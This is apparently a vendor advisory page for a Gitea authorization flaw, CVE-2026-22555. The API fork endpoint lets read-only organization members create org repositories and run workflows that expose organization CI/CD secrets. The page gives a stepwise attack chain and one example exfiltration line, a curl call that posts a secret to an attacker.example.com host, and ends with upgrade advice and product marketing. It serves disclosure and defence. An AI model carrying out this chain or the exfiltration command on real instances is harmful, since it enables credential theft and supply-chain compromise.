CVE-2026-22555 is a high-severity incorrect authorization vulnerability in code.gitea.io/gitea (go), affecting versions < 1.26.0. It is fixed in 1.26.0.
Summary The API endpoint POST /api/v1/repos/{owner}/{repo}/forks only checks IsOrgMember() when a user forks a repository into an organization, but does not check CanCreateOrgRepo(). The web UI fork handler correctly checks both. This allows a read-only organization member, in a team with cancreateorgrepo=false, to create repositories in the organization namespace via the API. The attacker receives full admin permissions on the forked repository, can enable Actions, push arbitrary workflow files, and exfiltrate all organization-level CI/CD secrets (deploy keys, cloud credentials, API tokens) through the runner infrastructure. Steps To Reproduce Environment setup Start a Gitea instance with Actions enabled: Create the target environment (as admin) Register an Actions runner Verify attacker CANNOT create repos in the org (expected: 403) Exploit: Fork into the org via API (THE BYPASS) The attacker now has admin+push access to an org-owned repository, despite being in a team with cancreateorgrepo=false. Enable Actions and push exfiltration workflow Verify secret exfiltration Expected output in the workflow logs: All three organization-level secrets are accessible to the attacker's workflow. In a real attack, the workflow would exfiltrate secrets to an attacker-controlled endpoint (e.g., curl -d "$SECRET" https://attacker.example.com/collect). Impact A read-only organization member, with no repository creation rights (cancreateorgrepo=false), can exfiltrate all organization-level CI/CD secrets by exploiting a missing authorization check in the API fork endpoint. The web UI correctly enforces the CanCreateOrgRepo permission, but the API does not, creating a classic API-vs-web authorization inconsistency. The attack chain is: (1) fork an existing org repo back into the same org via the API, bypassing the CanCreateOrgRepo check; (2) receive admin permissions on the fork as its creator; (3) enable Actions and push a workflow that references org secrets; (4) the org's runner picks up the job (runners match on repository.ownerid), and org secrets are injected into the workflow environment (fetched by Repo.OwnerID); (5) the workflow exfiltrates all org secrets. Organization secrets commonly include deploy keys, cloud credentials (AWS IAM keys, GCP service accounts), container registry tokens, and personal access tokens with broad scope. Stolen credentials enable lateral movement to cloud infrastructure, private repositories, and external services far beyond the Gitea instance itself. The attacker can also push arbitrary code under the organization's trusted namespace, creating supply chain risk for downstream consumers. This is particularly dangerous because organizations commonly use read-only teams for auditors, reviewers, contractors, or new employees, precisely the users who should NOT have access to production secrets. Supporting Material/References poc-fork-authz-bypass.zip, ZIP archive containing the full exploit script and README Vulnerable code, API fork handler (missing CanCreateOrgRepo check): https://github.com/go-gitea/gitea/blob/79f96b3e24/routers/api/v1/repo/fork.go#L135-L144 Correct code, Web fork handler (has CanCreateOrgRepo check): https://github.com/go-gitea/gitea/blob/79f96b3e24/routers/web/repo/fork.go#L181-L189 Runner task assignment (matches on owner_id): https://github.com/go-gitea/gitea/blob/79f96b3e24/models/actions/task.go#L245-L248 Secret injection (fetches by Repo.OwnerID): https://github.com/go-gitea/gitea/blob/79f96b3e24/models/secret/secret.go#L167 Fork creator gets admin permissions: https://github.com/go-gitea/gitea/blob/79f96b3e24/services/repository/create.go#L433-L440 Related fix: PR #34031 fixed a similar bypass via repo transfers, confirming this class of authorization inconsistency is treated as a vulnerability OWASP API Security Top 10 2023: API5, Broken Function Level Authorization OWASP Top 10 2021: A01, Broken Access Control poc-fork-authz-bypass.zip
The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions. Typical impact: unauthorized data access or execution of privileged operations.
CVE-2026-22555 has a CVSS score of 8.1 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment.
A fixed version is available (1.26.0). Upgrading removes the vulnerable code path.
go
code.gitea.io/gitea (< 1.26.0)code.gitea.io/gitea → 1.26.0 (go)Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter instead of chasing every advisory.
Kodem's runtime-powered SCA identifies whether CVE-2026-22555 is reachable in your applications. Explore open-source security for your team.
See if CVE-2026-22555 is reachable in your applications. Get a demo
Upgrade code.gitea.io/gitea to 1.26.0 or later to resolve this vulnerability.
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
CVE-2026-22555 is a high-severity incorrect authorization vulnerability in code.gitea.io/gitea (go), affecting versions < 1.26.0. It is fixed in 1.26.0. The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions.
CVE-2026-22555 has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
code.gitea.io/gitea (go) versions < 1.26.0 is affected.
Yes. CVE-2026-22555 is fixed in 1.26.0. Upgrade to this version or later.
Whether CVE-2026-22555 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
Upgrade code.gitea.io/gitea to 1.26.0 or later.